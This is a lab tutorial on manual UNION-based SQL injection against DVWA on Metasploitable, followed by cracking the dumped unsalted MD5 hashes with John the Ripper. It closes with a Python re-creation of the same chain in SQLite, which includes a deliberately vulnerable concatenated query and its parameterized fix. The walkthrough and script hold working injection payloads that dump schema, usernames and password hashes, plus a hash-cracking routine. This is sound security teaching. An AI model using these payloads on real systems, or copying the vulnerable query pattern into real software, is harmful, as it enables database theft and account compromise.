September 16, 2016

In this lab we'll begin a series on SQL injection. This will be a multi-part article/guide, and this first part walks through a manual, UNION-based injection against DVWA and cracking of the hashes it yields.

Let's start with the lab setup:

> A Kali Linux (or BackTrack 5 R3) VM and a Metasploitable VM, both attached to the same NAT network.

> Check the IP address of both machines (ifconfig on each) so the attacker VM can reach the DVWA web server.

Step-by-step instructions

1. Open Kali Linux (or BackTrack 5 R3).

2. Open your browser and go to http://<IP address of Metasploitable>/dvwa/login.php

3. Log in with user name "admin" and password "password".

4. Click DVWA Security, set the level to low and click Submit.

5. Click SQL Injection in the left-hand menu.

6. In the User ID box type 1 and click Submit. You get the first and last name of user 1.

(PHP select statement behind the page at the low level: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)

$id is dropped into the query by string concatenation, inside single quotes. Every payload below therefore starts by closing that quote, and ends by dealing with the leftover closing quote the PHP appends.

7. Type %' or '0'='0 in the User ID box and submit. Every row comes back: the leading %' closes the quoted literal, and '0'='0 is always true.

(Resulting query: mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)

8. Get the DB version: %' or 0=0 union select null, version() #

9. Get the DB user: %' or 0=0 union select null, user() #

10. Get the DB name: %' or 0=0 union select null, database() #

(The original SELECT returns two columns, so the UNION must also return two; null pads the first. The trailing # starts a MySQL comment that swallows the closing quote appended by the PHP, so the query stays syntactically valid. The injected value shows up as an extra "name" row in the page output.)

11. Get schema information (list every table the DB user can see): %' and 1=0 union select null, table_name from information_schema.tables #

(and 1=0 makes the original WHERE clause false, so only the UNIONed rows are displayed.)

12. Narrow it down to tables whose name starts with "user": %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #

13. Get all the column names of the users table from information_schema: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

14. Now dump the password hashes: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

(0x0a is a newline, so each field is printed on its own line. DVWA stores the passwords as unsalted MD5 hashes.)

15. Copy the user names and hashes into a text file, one account per line, in the format below.

E.g. user:hash

16. Save it as dvwa_password.txt in /pentest/passwords/john (the BackTrack location of John the Ripper; on Kali, john is already on the PATH, so you can save the file anywhere and drop the ./ below).

17. Open a console and go to /pentest/passwords/john

18. cd /pentest/passwords/john

19. Now launch John the Ripper:

./john --format=raw-md5 dvwa_password.txt and hit enter.

(raw-md5 is the right format because the hashes are plain, unsalted MD5. John prints each password as it is cracked; ./john --show dvwa_password.txt lists the cracked ones afterwards.)
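The whole chain from steps 6 to 19, as one added, runnable example (this is not code from the original post or from DVWA): an in-memory SQLite database stands in for the MySQL behind DVWA, the users table keeps DVWA's column layout and unsalted-MD5 storage, and the sample accounts and wordlist are constructed for the demo. The vulnerable lookup reproduces the string concatenation from step 6 next to its prepared-statement fix, then the payloads from steps 7, 8 and 14 are run through it and the dumped hashes are cracked the way john's raw-md5 mode does. SQLite differences from MySQL are noted in the comments.

```python
"""Added example, not from the original post: steps 6-19 re-created offline.

An in-memory SQLite database stands in for the MySQL behind DVWA. The users
table keeps DVWA's columns and unsalted-MD5 passwords; rows and wordlist are
constructed for this demo. SQLite differences from MySQL, noted inline: '--'
ends a comment where MySQL also takes '#', '||' with char(10) replaces
concat(..., 0x0a, ...), and sqlite_version() stands in for version().
"""
import hashlib
import sqlite3

# Constructed sample accounts (admin/password is the DVWA login from step 3).
SAMPLE_USERS = [
    # user_id, first_name, last_name, user, cleartext password
    (1, "admin", "admin", "admin", "password"),
    (2, "Alice", "Example", "alice", "letmein"),
    (3, "Bob", "Example", "bob", "Tr0ub4dor&3"),  # deliberately not in WORDLIST
]

# Constructed mini wordlist standing in for john's default password list.
WORDLIST = ["123456", "password", "letmein", "abc123", "qwerty"]


def md5_hex(text):
    """Unsalted MD5 hex digest: how DVWA stores passwords, what raw-md5 cracks."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_db():
    """Create the users table and load the sample accounts with hashed passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                     [(i, f, l, u, md5_hex(p)) for i, f, l, u, p in SAMPLE_USERS])
    return conn


def vulnerable_lookup(conn, user_id):
    """DVWA low: the id is spliced into the SQL string, quotes and all.
    Returns the query actually executed together with its rows."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return query, conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    """Hardened form: a bound parameter is data and can never close the quote."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


# Step 7: %' closes the literal, '0'='0 makes the WHERE always true.
ALL_ROWS = "%' or '0'='0"
# Step 8 analogue: UNION appends attacker-chosen values; null pads the column
# count to two and the trailing comment swallows the page's own closing quote.
DB_VERSION = "%' or 0=0 union select null, sqlite_version() -- "
# Step 14 analogue: user and hash in one column, separated by a newline.
DUMP_HASHES = ("%' and 1=0 union select null, user || char(10) || password "
               "from users -- ")


def db_version(conn):
    """Step 8: the injected row is the one whose first column is the null pad."""
    _, rows = vulnerable_lookup(conn, DB_VERSION)
    return next(value for first_name, value in rows if first_name is None)


def dump_hashes(conn):
    """Steps 14-15: run the UNION dump and split each row into user -> hash.
    'and 1=0' suppresses the original rows, so every row here is injected."""
    _, rows = vulnerable_lookup(conn, DUMP_HASHES)
    hashes = {}
    for _first_name, blob in rows:
        user, digest = blob.split("\n", 1)
        hashes[user] = digest
    return hashes


def crack_md5(hashes, wordlist):
    """Step 19 in miniature: what john --format=raw-md5 does with a wordlist.
    Unsalted hashes mean each candidate word is hashed once and compared
    against every user; users with no match map to None."""
    table = {md5_hex(word): word for word in wordlist}
    return {user: table.get(digest) for user, digest in hashes.items()}


def main():
    conn = build_db()
    query, rows = vulnerable_lookup(conn, ALL_ROWS)
    print(f"[step 7]  {query}\n          -> {len(rows)} rows")
    print(f"[step 8]  engine version: {db_version(conn)}")
    hashes = dump_hashes(conn)
    print(f"[step 14] {hashes}")
    print(f"[step 19] {crack_md5(hashes, WORDLIST)}")
    print(f"[fixed]   same payload, bound parameter: {safe_lookup(conn, ALL_ROWS)}")


if __name__ == "__main__":
    main()
```

Running the script shows the step 7 payload returning all three accounts, the UNION payloads smuggling the engine version and the user/hash pairs into the result set, the wordlist recovering two of the three passwords, and the same step 7 payload returning nothing once the id is passed as a bound parameter.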

OK Gurkhas, we'll continue this in the next part.